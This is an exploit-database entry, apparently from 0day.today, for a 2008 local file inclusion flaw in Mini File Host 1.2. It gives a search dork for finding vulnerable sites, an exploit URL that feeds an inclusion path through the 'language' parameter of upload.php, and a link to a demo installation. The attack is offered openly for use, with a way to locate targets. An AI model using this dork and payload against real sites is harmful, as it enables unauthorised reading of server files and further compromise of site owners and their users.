id: 2513
date: 01/17/2008
title: Mini File Host 1.2 (upload.php language) LFI Vulnerability
author: Scary-Boys
cves: 

==========================================================
Mini File Host 1.2 (upload.php language) LFI Vulnerability
==========================================================




#########################################################################
#         Mini File Host <= 1.2 Local File Inclusion Vulnerability      #
#########################################################################
AUTHOR     : Scary-Boys							#
HOME       : http://scary-boys.com					#
#########################################################################
DorKs      : "Powered By Mini File Host V1.2"         			#
#########################################################################
## EXPLOIT :                                          			#
http://server.com/Path/pages/upload.php?language=[-LFI-] 		#
#########################################################################
## GREETZ  : S.W.A.T. My Best Friend For Founding This Vuln & Helped Me #
#########################################################################

http://www.galaxyscripts.com/demo/mfh12/



#  0day.today [2023-03-27]  #